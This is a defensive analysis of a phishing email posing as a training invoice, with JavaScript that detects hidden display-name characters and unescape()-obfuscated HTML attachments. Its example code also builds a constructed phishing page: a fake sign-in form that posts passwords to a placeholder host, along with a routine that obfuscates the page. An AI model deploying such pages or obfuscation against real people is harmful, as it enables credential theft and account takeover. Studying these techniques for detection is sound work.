Credential Phishing Attack Masquerades as an Employee Training Invoice
In this attack, a company executive received an email claiming to contain an invoice for training. The message was constructed so that the sender's email address was not displayed, and the sending display name was set to "I N VOICE-176152", with hidden encoded characters inserted between the letters. Analysis of the email headers showed that the message had been sent through a compromised external domain.
Attached to the email was an HTML file whose name matched the invoice number referenced in the subject line. The source of the HTML attachment was obfuscated: the page content was stored as an encoded string and decoded at load time with the JavaScript unescape() function, so the readable markup never appears in the raw file. Had the recipient opened the file, a new browser window would have appeared stating that they were being directed "to your organization's sign-in page." After a few seconds, the page would have replaced itself with a fake Microsoft login page pre-filled with the recipient's email address, leaving only the password to be entered.
How Does This Attack Bypass Email Defenses?
The hidden encoded characters in the display name defeat detection tools that rely on matching known malicious text strings: "INVOICE" broken up by invisible characters no longer matches a signature written for the plain word. Because the sender's email address was hidden, it could not be compared against known malicious accounts. And because the attachment's source code was obfuscated, a basic scan of the raw file for malicious artifacts such as URLs would have found nothing, since the URLs only exist after the encoded string is decoded.
How Can This Attack Be Detected?
HTML attachments are commonly used to deliver phishing payloads without placing the malicious content in the email body, where it would be scanned directly. Obfuscated source code is a common tactic in these attacks and is itself a signal worth weighting. In-depth analysis of the attachment, decoding the embedded string rather than scanning the raw source as written, exposes the artifacts the obfuscation was meant to hide: the redirect text, the credential form, and the URL the form submits to. The absence of a sending email address is another indicator of a malicious source. A holistic detection system that can extract and analyze URLs from email attachments is required to assess the intent of any links, and that result must be combined with the other signals from content analysis, such as the hidden characters in the display name and the missing sender address, to determine whether the email is malicious.
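As an added illustration (not code from the original report or from any product it describes), the following JavaScript stands in for both the obfuscation described earlier and the attachment analysis recommended here. It builds a constructed sample of an unescape()-obfuscated attachment, then runs a small static detector over a constructed email: it strips hidden Unicode format characters from the display name so the lure keyword matches again, flags the missing sender address, decodes the unescape() literal without executing the script, and extracts the URL and credential-form indicators from the decoded page. The phishing page, the domain names, the signal names and the verdict threshold are all placeholders chosen for the example.

```javascript
// Added example, not code from the original report: a small static detector
// for the signals described above (hidden characters in the display name,
// missing sender address, unescape()-obfuscated HTML attachment). All
// inputs below are constructed for illustration; domains are placeholders.

// Constructed stand-in for the decoded phishing page: a "redirecting to your
// sign-in page" notice that swaps itself for a credential form after a delay.
const FAKE_LOGIN_PAGE = `<html><body>
<p>Redirecting to your organization's sign-in page...</p>
<script>
setTimeout(function () {
  document.body.innerHTML = '<form action="https://login-verify.example/auth" method="post">' +
    '<input name="login" value="exec@victim.example">' +
    '<input type="password" name="passwd"><button>Sign in</button></form>';
}, 3000);
</script></body></html>`;

// Obfuscation of the kind the report describes: the whole page is stored as a
// percent-encoded string and rebuilt at load time with the legacy unescape().
function obfuscateAttachment(html) {
  return `<script>document.write(unescape("${escape(html)}"));</script>`;
}

// Unicode format characters that render as nothing but break naive keyword
// matching (soft hyphen, zero-width space/joiner, directional marks, BOM).
const HIDDEN_CHAR = /[\u00AD\u200B-\u200F\u2060\uFEFF]/;

// Remove hidden characters and whitespace so "I N VOICE" compares as "INVOICE".
function normalizeDisplayName(name) {
  return name
    .replace(new RegExp(HIDDEN_CHAR.source, 'g'), '')
    .replace(/\s+/g, '')
    .toUpperCase();
}

// Statically decode every unescape("...") literal instead of executing the
// script; repeat in case the attacker stacked several layers.
function deobfuscate(html) {
  const literal = /unescape\(\s*(["'])([^"']*)\1\s*\)/g;
  let out = html;
  for (let layer = 0; layer < 5; layer++) {
    const next = out.replace(literal, (_m, _q, body) => unescape(body));
    if (next === out) break;
    out = next;
  }
  return out;
}

// URLs only become visible after decoding, which is the point of the exercise.
function extractUrls(html) {
  return html.match(/https?:\/\/[^\s"'<>]+/g) || [];
}

// Combine the individual signals into a verdict. The threshold is arbitrary.
function analyzeEmail(email) {
  const signals = [];
  if (!email.fromAddress) signals.push('sender address missing');
  if (HIDDEN_CHAR.test(email.displayName)) signals.push('display name contains hidden characters');
  if (/INVOICE/.test(normalizeDisplayName(email.displayName))) signals.push('lure keyword in display name');
  for (const att of email.attachments) {
    if (!/\.html?$/i.test(att.name)) continue;
    const decoded = deobfuscate(att.content);
    if (decoded !== att.content) signals.push(`${att.name}: unescape() layer decoded`);
    if (/sign-in page/i.test(decoded)) signals.push(`${att.name}: sign-in redirect text`);
    if (/type=["']password["']/i.test(decoded)) signals.push(`${att.name}: credential form`);
    if (/value=["'][^"'\s]+@[^"'\s]+["']/.test(decoded)) signals.push(`${att.name}: pre-filled address`);
    for (const url of extractUrls(decoded)) signals.push(`${att.name}: URL ${url}`);
  }
  return { signals, verdict: signals.length >= 3 ? 'malicious' : 'clean' };
}

// Constructed sample modelled on the report: no sender address, display name
// padded with zero-width spaces, HTML attachment named like the subject line.
const SAMPLE_EMAIL = {
  fromAddress: '',
  displayName: 'I\u200BN\u200B VOICE-176152',
  attachments: [{ name: 'INVOICE-176152.html', content: obfuscateAttachment(FAKE_LOGIN_PAGE) }],
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(analyzeEmail(SAMPLE_EMAIL));
}
```

Decoding the literal with unescape() in the analyzer rather than rendering the attachment keeps the attacker's script from ever running; the regex only needs to find the string literal, which is why a quick scan of the raw file (no URLs, no form) and a decoded view (URL, password field, pre-filled address) give such different answers.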
What are the Risks of This Attack?
If the executive had entered credentials into the phishing page, the attackers would have had full access to their email account. They could then search the mailbox for sensitive information or use the account as a launch point for further attacks on the employee's coworkers, customers, or vendors, with messages that now come from a legitimate internal address.